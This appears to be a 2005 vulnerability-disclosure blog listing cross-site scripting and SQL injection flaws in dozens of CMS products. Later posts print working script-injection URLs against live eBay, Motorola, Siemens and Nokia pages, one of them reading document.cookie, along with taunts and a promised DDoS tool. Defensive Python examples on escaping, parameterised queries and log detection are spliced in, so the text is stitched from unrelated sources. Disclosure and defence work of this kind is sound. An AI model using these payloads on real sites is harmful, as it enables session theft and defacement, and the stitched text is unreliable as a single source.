    The SpireMedia CMS is an enterprise class Content Management System for managing Websites, Intranets, and Extranets. It runs under the ColdFusion application server and is platform neutral. The system is component-based, allowing object properties to be extended via custom components, and provides support for many applications such as message boards, calendaring, tech tips, user contributed content, etc. The SpireMedia CMS is currently deployed for such companies as Steamboat Ski and Resort, United Agri Products, GE Johnson Construction, Rocky Mountain Clothing Company, Qwest Incredible Internet, and many others.

    Vuln. Description:

    SpireMedia CMS contains a flaw that allows remote SQL injection attacks. Input passed to the "cid" parameter in "index.cfm" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    SPIP XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.spip.net/en
    affected version:1.8.2 and prior

    Product Description:

    SPIP is a publishing system developed by the minirézo to manage the site uZine. We provide it to anyone as free software under the GPL license. Therefore, you can use it freely for your own site, be it personal, co-operative, institutional or commercial.

    Vuln. Description:

    SPIP contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to parameters in the "spip_login.php3" and "spip_pass.php3" fields isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Speartek XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.speartek.com
    affected version:6.0 and prior


    Product Description:

    SpearTek's advanced solutions help you optimize the Internet channel to fuel ongoing business success. Our technology enables companies to leverage a single platform to manage content, email marketing and ecommerce applications, easily and cost-effectively. Whether you are a multi-million dollar enterprise or a start-up venture, our solutions advance your business objectives by delivering real return on investment while enhancing the customer experience.


    Vuln. Description:

    SpearTek contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    SiteSage XSS vuln

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.starphire.com/
    affected version: 5.0.18 and prior, SiteSage-EE, SiteSage-SE, SiteSage-SB, SiteSage-LE

    Product Description:

    SiteSage provides a completely non-technical web content management system for the creation and administration of your web site. Features include; built in Templates and Themes, Font Style Editor, WYSIWYG Content Editor, Message Boards, Mailing Lists, Sign up Forms, Banner Ad Manager, Dynamic Content Rotation, and much more. SiteSage is a complete ASP application for installation on your (or your hosting firm's) MS IIS web server. SiteSage is entirely server based permitting updates to a website to be made from work, home, or anywhere. SiteSage can be completely installed to your web server using standard FTP access. The Lite Edition is free for both commercial and non-commercial use.


    Vuln. Description:

    SiteSage contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "norelay_highlight_words" parameter when performing a search isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Sitekit CMS multiple XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.sitekit.net/
    affected version:v6.6 and prior

    Product Description:

    Sitekit CMS v6.6 enables non-technical business users to manage every aspect of their website with ease. Providing a fully supported, secure and managed service, Sitekit Content Management System Technology together with our UK wide Partner Network is your assurance of web excellence. Sitekit CMS has a comprehensive range of web management features such as E-Marketing, E-Business and Asset Managers, each designed to give you the power of the web at your finger tips. No fuss. No headaches. Just seamless performance. With four full product launches per year, Sitekit Solutions are relentless in providing the latest business benefits. * Top Search Engine Rankings * Leading Accessibility (Bobby AAA, W3C) * Ease of use * Strong Return on Investment * Flexible solution that can be scaled in size and function * Seamless integration with IT systems

    Vuln. Description:

    Sitekit CMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "textonly", "locID", "lang" and "ClickFrom" parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    examples:

    /default.aspx?[xss]
    /Default.aspx?textonly=[xss]
    /Default.aspx?textonly=1&locID=[xss]
    /Default.aspx?textonly=1&locID=0ad00v005&lang=[xss]
    /Request-call-back.html?ClickFrom=[xss]
    /registration-form.html?ClickFrom=[xss]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    SCOOP! Multiple XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://scoop.cim.com.au/
    affected version:2.3 and prior


    Product Description:

    SCOOP! is the innovative Australian web content management system that will change the way we see and manage the content of our web sites. The SCOOP! web content management system allows web site managers and owners to publish and manage web site content without any HTML or web scripting knowledge. SCOOP! employs browser based editing of web content and template management. Content managers rather than programmers or IT departments, can publish text and images through an intuitive browser based interface, from anywhere, anytime.

    Vuln. Description:

    SCOOP! contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "keywords", "username", "area", "articleZoneID" and "r" parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    +

    An attacker can choose which parameters he wants to show/give to his target, using "category.asp", "articleZone.asp", "account_login.asp", "lostPassword.asp" or "articleSearch.asp", because in those scripts the parameters aren't filtered; see the examples below:

    examples:


    /articleSearch.asp?keywords=[XSS]

    /lostPassword.asp?username=[XSS]

    /account_login.asp?Username=[XSS]

    /account_login.asp?Password=[XSS]

    /category.asp?area=[XSS]

    /category.asp?area=support&articleZoneID=[XSS]

    /category.asp?area=support&articleZoneID=132&r=[XSS]


    You can change the parameter name to anything you want wherever the script uses parameters :)

    /category.asp?pridels_Crew_XSS_r0t=[XSS]

    /articleZone.asp?r0t_r0t_r0t_r0t_r0t=[XSS]

    /account_login.asp?r0t_like_THIS=[XSS]

    /lostPassword.asp?GIVE_TO_r0t_ADMIN_PWD=[XSS]

    /articleSearch.asp?FIND_SCOOP!_BEST_CODERS=[XSS]

    /prePurchaserRegistration.asp?isn't_lame_2_purchase?=[XSS]

    /requestDemo.asp?_whata_*faq*?=[XSS]


    Solution:
    Edit the source code to ensure that input is properly sanitised.
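    The advisories above all share one root cause: a script copies parameter names and values from the query string straight into its HTML response. The following is an added illustration in Python, not code from SCOOP! or any other product on this page; the probe URL, the page layout and the function names are constructed for the example. It renders the same "search results" page twice, once echoing the raw input and once passing every reflected string through html.escape, and gives a small check that shows which version still carries live markup.

```python
"""Reflected XSS: raw echo of query-string input beside the encoded version.

Added example; the URL, page layout and helper names are constructed.
"""
import html
from urllib.parse import parse_qsl, urlsplit

# Constructed probe URL: markup is smuggled both in a value and in a
# parameter *name*, mirroring the "[XSS]" placeholders in the advisory.
PROBE_URL = (
    "/articleSearch.asp?keywords=%3Cscript%3Ealert(1)%3C/script%3E"
    "&%3Cimg%20src%3Dx%20onerror%3Dalert(2)%3E=1"
)


def _params(url):
    """Decoded (name, value) pairs; blank values are kept so that a
    name-only probe such as "?[XSS]" is still reflected."""
    return parse_qsl(urlsplit(url).query, keep_blank_values=True)


def render_vulnerable(url):
    """Echoes every parameter name and value unencoded, the flaw described above."""
    rows = "".join(f"<li>{name} = {value}</li>" for name, value in _params(url))
    return f"<h1>Search</h1><ul>{rows}</ul>"


def render_fixed(url):
    """Same page, but every reflected string is HTML-encoded, so the browser
    treats it as text rather than as markup.  quote=True also encodes the
    quote characters, which matters when a value lands inside an attribute."""
    rows = "".join(
        f"<li>{html.escape(name, quote=True)} = {html.escape(value, quote=True)}</li>"
        for name, value in _params(url)
    )
    return f"<h1>Search</h1><ul>{rows}</ul>"


def reflects_markup(page):
    """Crude verification check: does a tag from the input survive as a real
    tag?  An encoded tag starts with '&lt;', so it no longer matches."""
    lowered = page.lower()
    return "<script" in lowered or "<img" in lowered


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(PROBE_URL))
    print("fixed:     ", render_fixed(PROBE_URL))
    print("vulnerable reflects markup:", reflects_markup(render_vulnerable(PROBE_URL)))
    print("fixed reflects markup:     ", reflects_markup(render_fixed(PROBE_URL)))
```

    The point of encoding the *name* as well as the value is exactly the SCOOP! observation that any parameter name is echoed: a filter applied only to known parameters leaves the generic "unknown parameter" echo untouched.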

    Scoop XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://scoop.kuro5hin.org/
    affected version: 1.1 RC1 and prior

    Product Description:

    Scoop is a "collaborative media application". It falls somewhere between a content management system, a web bulletin board system, and a weblog. Scoop is designed to enable your website to become a community. It empowers your visitors to be the producers of the site, contributing news and discussion, and making sure that the signal remains high.

    A scoop site can be run almost entirely by the readers. The whole life-cycle of content is reader-driven. They submit news, they choose what to post, and they can discuss what they post. Readers can rate other readers comments, as well, providing a collaborative filtering tool to let the best contributions float to the top. Based on this rating, you can also reward consistently good contributors with greater power to review potentially untrusted content. The real power of Scoop is that it is almost totally collaborative.

    Of course, as an admin, you also may pick and choose which tools you want the community to have, and which will be available to admins only. Administrators have a very wide range of customization and security management tools available. All of the administration of Scoop is done through the normal web interface. Scoop will seamlessly provide more options to site administrators, right in the normal site, so the tools you need are always right where you need them.



    Vuln. Description:

    Scoop contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "type" and "count" parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    examples:

    /?op=search&offset=0&old_count=30&type=[XSS]

    /?op=search&offset=0&old_count=30&type=story
    &topic=§ion=&string=r0t&count=1[XSS]



    /story/2005/11/4/184932/452[XSS]
    /story/2005/11/4/184932[XSS]
    /story/2005/11/4[XSS]
    /story/2005/11[XSS]
    /story/2005[XSS]
    /story/[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Redakto WCMS multiple XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://computeroil.com/
    affected version:3.2 and prior

    Product Description:

    With our Content Management System Redakto, you and your team can easily maintain, organize and design your web presentation. No coding skills or the like are needed to get you up and running. Still you will get all the flexibility to adjust your website to your needs.
    Within minutes you will be able to start filling in your content, insert images and documents, import your Word/Excel files, generate multilingual websites and much more. Redakto offers you an intuitive and easy to use user interface and can be used with every browser.


    Vuln. Description:

    Redakto WCMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "iid"/"iid2", "lang", "r", "cart", "str", "nf" and "a" parameters and to search module parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    examples:


    /index.tpl?iid=[XSS]

    /index.tpl?iid=l3a1b3&lang=[XSS]

    /index.tpl?iid=l3a1b3&lang=1&iid2=[XSS]

    /index.tpl?iid=l3a1b3&lang=1&iid2=3&r=[XSS]

    /index.tpl?iid=l093a1b1&lang=1&iid2=[iid2]&r=
    [r]&cart=[XSS]

    /index.tpl?iid=l093a1b1&lang=1&iid2=[iid2]&r=
    [r]&cart=11351542306899006&str=[XSS]

    /index.tpl?a=search_adv&cart=113515443393191
    01&lang=1&iid=13&nf=[XSS]

    /index.tpl?a=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    RAMSite R|1 CMS XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://ramsiter1.imikalsen.com/
    affected version:1.0 and prior

    Product Description:

    The RAMSite R|1 CMS is an advanced, yet easy to use and lightweight, complete web-publishing solution. It is filled with useful and interesting features, and is built upon an architecture specifically designed to allow impressive development cycles for additional modules.

    Vuln. Description:

    RAMSite R|1 CMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    ProjectApp multiple XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:www.aspapp.com/content.asp?contentid=323
    affected version:v3.3 and prior

    Product Description:

    ProjectApp is a customizable groupware solution that provides a suite of project and task management tools to foster team communication. Track projects and tasks, share and distribute centralized docs and knowledge.

    Vuln. Description:

    ProjectApp contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "keywords", "projectid", "ret_page" and "skin_number" parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    examples:

    /forums.asp?keywords=[XSS]
    /search_employees.asp?keywords=[XSS]
    /cat.asp?keywords=[XSS]
    /links.asp?keywords=[XSS]
    /pmprojects.asp?projectid=[XSS]
    /login.asp?ret_page=[XSS]
    /default.asp?skin_number=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    IntranetApp XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:www.aspapp.com/content.asp?contentid=322
    affected version:3.3 and prior

    Product Description:

    IntranetApp gets groups on the same page with tools to enhance collaboration and communication. With this pre-built application you can create and manage company employees, news, events, projects, tasks, Web resources, documents and discussion forums. IntranetApp is completely Web based and customizable. Full source code (standard .asp) included.

    Vuln. Description:

    IntranetApp contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "ret_page" parameter in "login.asp" and to the "do_search" and "search" parameters in "content.asp" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    example:

    /login.asp?ret_page=[XSS]

    /content.asp?CatId=&ContentType=
    &keywords=r0t&search=%3E&do_search=[XSS]

    /content.asp?CatId=&ContentType=&
    keywords=r0t&search=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    SiteEnable XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.siteenable.com/
    affected version:3.3 and prior

    Product Description:

    SiteEnable is an open source Web application that combines content management and collaboration tools. It falls somewhere between a portal, content management system, a web bulletin board system and a collaborative application. SiteEnable is an instant website that is skinnable and standards-based. SiteEnable enables you or your staff to easily update content -- wherever and whenever you need. SiteEnable can be used as a content management system, business Website, collaboration tool, community, project management tool and other content-centric Web-based initiatives.

    Vuln. Description:

    SiteEnable contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "ret_page" parameter in "login.asp" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    example:


    /login.asp?ret_page=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    PortalApp XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.portalapp.com/
    affected version:3.3 and prior


    Product Description:

    PortalApp is an open source Web application that combines content management with e-commerce and collaboration. It falls somewhere between a portal, content management system, a web bulletin board system, storefront and a collaborative application. PortalApp is an instant website that is skinnable and standards-based. PortalApp is designed to enable you to address 90% of the functionality that most Websites require. It enables you to sell on-line, manage members, and easily update content -- wherever and whenever you need. PortalApp can be used as a content management system, business Website, collaboration tool, community, project management tool and other content-centric Web-based initiatives.


    Vuln. Description:

    PortalApp contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "ret_page" parameter in "login.asp" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    example:

    /login.asp?ret_page=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Polopoly XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.polopoly.com/
    affected version:9 and prior

    Product Description:

    Polopoly is 100% Java since 1996 and embraces standards and open architecture. The system is browser independent, DB independent, and platform independent. The system thrives in high traffic, personalized web environments.

    Vuln. Description:

    Polopoly contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Plexcor's® CMS XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.plexcor.com/
    affected version: 4.0 and prior

    Product Description:

    Integrated modular content, communications, calendar, commerce, customer and project management solution


    Vuln. Description:

    Plexcor contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    phpSlash SQL vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.php-slash.org/
    affected version:0.8.1 and prior

    Product Description:

    phpSlash is a CMS that provides an easy and flexible means to publish websites. It currently boasts full HTML templates, an OO design, the ability to operate in a hosted environment, and a bunch of other goodies.

    Vuln. Description:

    phpSlash contains a flaw that allows remote SQL injection attacks. Input passed to the "story_id" parameter in "article.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    example:

    /article.php?story_id=1[SQL]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Papoo Multiple SQL vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.papoo.org/
    affected version:2.1.2 and prior

    Product Description:

    Papoo is an easy to use, accessible CMS. Its frontend and administration follow the rules of the WCAG and ATAG. Papoo is Open Source.

    Vuln. Description:

    Papoo contains a flaw that allows remote SQL injection attacks. Input passed to the "menuid" parameter in "index.php" and "guestbook.php", and to the "forumid" and "reporeid_print" parameters in "print.php", isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    examples:

    /index.php?menuid=[SQL]
    /guestbook.php?menuid=[SQL]
    /print.php?reporeid_print=&forumid=[SQL]
    /print.php?reporeid_print=[SQL]


    Solution:
    Edit the source code to ensure that input is properly sanitised.
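    The phpSlash ("story_id=1[SQL]") and Papoo ("menuid=[SQL]") advisories above describe the same defect: a numeric id from the query string is concatenated into the SQL text, so whatever follows the number becomes part of the query. The block below is an added illustration in Python against an in-memory SQLite database, not code from either project; the table, column and function names are invented for the example. It shows the interpolating query beside the fixed version that validates the type and binds the value as a query parameter, which is what "properly sanitised" has to mean for a SQL sink.

```python
"""SQL injection through an unquoted numeric id, and the parameterised fix.

Added example; the schema, rows and helper names are constructed.
"""
import sqlite3


def make_db():
    """Constructed sample data: two published stories and one unpublished draft."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE stories (story_id INTEGER PRIMARY KEY, title TEXT, published INTEGER)"
    )
    conn.executemany(
        "INSERT INTO stories VALUES (?, ?, ?)",
        [(1, "Public story", 1), (2, "Another public story", 1), (3, "Unpublished draft", 0)],
    )
    return conn


def fetch_story_vulnerable(conn, story_id):
    """Interpolates the raw request parameter into the SQL text (the flaw).
    Anything appended to the number is parsed as SQL, and because AND binds
    tighter than OR the 'published = 1' guard can be switched off entirely."""
    sql = f"SELECT title FROM stories WHERE published = 1 AND story_id = {story_id}"
    return [row[0] for row in conn.execute(sql)]


def fetch_story_fixed(conn, story_id):
    """Rejects anything that is not an integer, then binds the value with a
    placeholder so it can only ever be compared, never parsed as SQL."""
    try:
        sid = int(story_id)
    except (TypeError, ValueError):
        raise ValueError("story_id must be an integer")
    sql = "SELECT title FROM stories WHERE published = 1 AND story_id = ?"
    return [row[0] for row in conn.execute(sql, (sid,))]


def compare(story_id):
    """Run both variants on one input; returns (vulnerable_result, fixed_result)
    where the fixed result is the string 'rejected' when validation fails."""
    conn = make_db()
    vuln = fetch_story_vulnerable(conn, story_id)
    try:
        fixed = fetch_story_fixed(conn, story_id)
    except ValueError:
        fixed = "rejected"
    return vuln, fixed


if __name__ == "__main__":
    print(compare("1"))          # both return the one public story
    print(compare("1 OR 1=1"))   # vulnerable leaks every row, fixed rejects
```

    The vendor-side fix is the same in PHP, ASP or ColdFusion: cast or validate the id, and use the driver's placeholder binding rather than string concatenation.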

    papaya CMS XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.papaya-cms.com/
    affected version: 4.0.4 and prior

    Product Description:

    papaya CMS content management system and framework was designed for individual, mid-sized and enterprise wide deployments. The papaya CMS meets large-scale project requirements and offers extremely short implementation times. Since 2001, papaya CMS has been deployed at high profile customers such as AGOF (members include: AOL, GMX, Bauer, Gruner & Jahr, Web.de, Yahoo Inc., Lycos Inc. etc.), DHL and the Handelsblatt publishing group. papaya is based on proven OpenSource technologies such as PHP, XSLT/XML and supports RDBS (e.g. MySQL and PostgreSQL). papaya has been OpenSource software (under the GPL license) since 2005. papaya Software GmbH delivers website creation and custom application development. More information: www.papaya-cms.com PLEASE NOTE: The website is only available in German until mid-June 2005. The GUI and the documentation are already available in English. In the meantime, feel free to check http://www.lamparea.org/papaya_software.28.html for a short description or to contact the maintainer of this project for further information.

    Vuln. Description:

    papaya CMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "bab[searchfor]" parameter isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    example:

    /suche.153.html?bab[page]=6&bab[searchfor]=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    HOW secure is ebay.com?

    You will see how secure it is after checking the live example below :)

    http://search.ebay.com/search/search.dll?
    sofocus=bs&sbrftog=1&fcl=4&from=R10&catref
    =C12&satitle=fur+trim*&sacat=63862%26catref
    %3DC6&bs=Search&fsop=1%26fsoo%3D1&fgtp=&a54=
    -24%3Cscript%3Ealert()%3C/script%3E&a22868=-
    24&a94=-24&gcs=1110&pfid=1283&reqtype=1&pfmode=
    1&alist=a54%2Ca55%2Ca22868%2Ca53%2Ca94%2Ca3801
    &pf_query=fur+trim*&sargn=-1%26saslc%3D2&sadis
    =200&fpos=94062&sappl=1&ftrt=1&ftrv=1&sabdlo=
    &sabdhi=&saprclo=%22%3E%3Cscript%3Ealert(5)
    %3C/script%3E&saprchi='%22%3E%3Cscript%3Ealert
    (document.cookie)%3C/script%3E
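    The probe URLs in this and the following posts all carry the same fingerprint once the percent-encoding is removed: a quote that closes the current attribute, then a script tag. A defender watching a web server can spot such requests in the access log without knowing the application. The block below is an added example, not part of the original post: it parses constructed Common Log Format lines (invented hosts and paths), URL-decodes each query parameter, and flags the requests whose decoded names or values contain script or event-handler markup.

```python
"""Flag encoded script probes in web access logs.

Added example; the log lines, hosts and paths are constructed.
"""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample lines in Common Log Format.  Two are benign searches,
# two carry the '">' + <script> pattern seen in the live examples above.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Dec/2005:10:00:01 +0000] "GET /search.dll?q=fur+trim&page=2 HTTP/1.1" 200 5120
203.0.113.9 - - [21/Dec/2005:10:00:07 +0000] "GET /search.dll?q=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 5133
198.51.100.2 - - [21/Dec/2005:10:00:09 +0000] "GET /index.jsp?sdc_bcpath=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 7001
198.51.100.7 - - [21/Dec/2005:10:00:12 +0000] "GET /spg.jsp?cc=be&lc=nl&template=ph1_3 HTTP/1.1" 200 4400
"""

# Common Log Format request line: client, timestamp, method, target, status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Markup that has no business inside a decoded query parameter.
MARKUP_RE = re.compile(r"<\s*/?\s*script|<\s*img|on\w+\s*=|javascript:", re.IGNORECASE)


def decode_params(target):
    """Return (name, value) pairs.  parse_qsl removes one layer of percent
    encoding; the extra unquote_plus removes a second one, so a probe that
    was double-encoded (e.g. %253C for '<') is still seen in the clear."""
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    return [(unquote_plus(n), unquote_plus(v)) for n, v in pairs]


def find_xss_probes(log_text):
    """Return (ip, path, param_name, decoded_value) for every request in
    which a decoded parameter name or value contains script/handler markup."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip, don't crash
        path = urlsplit(m["target"]).path
        for name, value in decode_params(m["target"]):
            if MARKUP_RE.search(name) or MARKUP_RE.search(value):
                hits.append((m["ip"], path, name, value))
    return hits


if __name__ == "__main__":
    for ip, path, name, value in find_xss_probes(SAMPLE_LOG):
        print(f"{ip} {path} param={name!r} value={value!r}")
```

    Decoding before matching is the part that matters: a rule that looks for the literal string "<script" in the raw log line never fires on these requests, because every one of them arrives as "%3Cscript%3E".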

    I forgot SonyEricsson also makes good phones

    I forgot about those great phones that SonyEricsson develops

    manually:

    http://www.sonyericsson.com/spg.jsp?cc
    =be&lc=nl&ver=4000&template=ph1_3&zone=ps

    in search field enter: [XSS]

    SAGEM made phones:)

    I don't know many phone companies; the next one I remembered was Sagem, so here you go, their lame work!

    manually use:
    http://www.sagem-online.com/isa-b2c/b2c/accountForward.do

    in email field put: [XSS]

    Motorola isn't better:)

    This case isn't similar to the others, but it's a vuln anyway.
    In this case they chose to run their shop using the digitalriver service :)

    http://motorola.digitalriver.com/servlet/
    ControllerServlet?Action=DisplayHomeMotostor
    ShopPage&SiteID=motostor&Locale=en_US&Env=
    %22%3E%3Cscript%3Ealert('Motorola,%20r0t%20
    like%20some%20phones%20,%20but%20not%20your
    %20coders,%20your%20coders%20suck!')%3C/script%3E

    http://motorola.digitalriver.com/servlet/Contro
    llerServlet?Action=DisplayHomeMotostorShopPage
    &SiteID=motostor&Locale=%22%3E%3Cscript%3Ealert
    ('Motorola,%20r0t%20like%20some%20phones%20,%20
    but%20not%20your%20coders,%20your%20coders%20suck
    !')%3C/script%3E

    Siemens XSS, or they have good phones, but no coders :)

    http://siemens.com/index.jsp?sdc_ggid=
    &sdc_tabidx=&sdc_countryid=0&sdc_flags=
    0&sdc_pnid=0&sdc_zoneid=1&sdc_langid=1
    &sdc_sectionid=0&sdc_contentid=255&sdc_
    linkid=1327885&sdc_sid=33514031252&sdc_
    rh=&sdc_bcpath=%22%3E%3Cscript%3Ealert
    ('r0t%20loves%20siemens%20phones,but%20
    coders%20as%20always%20sucks!')%3C/scri
    pt%3E

    http://siemens.com/index.jsp?sdc_ggid=&s
    dc_tabidx=&sdc_countryid=0&sdc_flags=0&s
    dc_pnid=0&sdc_zoneid=1&sdc_langid=1&sdc_
    sectionid=0&sdc_contentid=%22%3E%3Cscript
    %3Ealert('r0t%20loves%20siemens%20phones,
    but%20coders%20as%20always%20sucks!')%3C/
    script%3E

    Solution:

    Get better coders!



    PS. coders from Siemens... lamers!

    NOKIA XSS, or r0t loves Nokia

    http://www.nokia.com/search/index.jsp?wsid=
    8&qt=&charset=%22%3E%3Cscript%3Ealert('r0t%20loves%
    20nokia%20phones,%20but%20coders%20sucks!')%3C/script%3E

    solution:
    Get better coders!

    OpenEdit XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.openedit.org
    affected version:4.0 and prior

    Product Description:

    Developed in partnership with Web designers, OpenEdit offers a host of popular features. It includes easy online editing, sophisticated eCommerce, corporate blogging and dynamic layouts in an open source environment for flexible, advanced website development. OpenEdit President Christopher Burkey and a core team of expert Java architects have created OpenEdit by combining the best of existing Java frameworks.

    Vuln. Description:

    OpenEdit contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "page" and "oe-action" parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    examples:
    /store/search/results.html?query=&department=&oe-action=[XSS]
    /store/search/results.html?page=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Tuesday, December 20, 2005

    OpenCms XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.opencms.org/
    affected version:6.0.3 and prior

    Product Description:

    OpenCms is a professional level Open Source Website Content Management System. OpenCms helps to create and manage complex websites easily without knowledge of html. An integrated WYSIWYG editor with a user interface similar to well known office applications helps the user creating the contents, while a sophisticated template engine enforces a site-wide corporate layout. As true Open Source software, OpenCms is completely free of licensing costs. OpenCms is based on Java and XML technology. Therefore it fits perfectly into almost any existing modern IT infrastructure. OpenCms runs in a "full open source" environment (e.g. Linux, Apache, Tomcat, MySQL) as well as on commercial components (e.g. Windows NT, IIS, BEA Weblogic, Oracle DB).

    Vuln. Description:

    OpenCms contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Monday, December 19, 2005

    about our site and board.

    I decided, or rather we decided, that our site and board will re-launch on 1 January 2006!
    Because neither I nor our other team members have enough time to manage it; the site and board are working now, but they aren't public.
    The board is only working because there are a lot of people who share their private advisories and exploits, which will only be public later or will never be public.
    Also I hope cembo will soon release the public "Alberts" DDOS attack tool.
    So, as you can imagine, we have a lot to do, but not enough time for everything.
